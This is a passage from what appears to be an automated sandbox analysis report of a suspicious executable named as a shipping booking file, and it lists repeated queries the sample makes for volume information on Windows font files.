Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
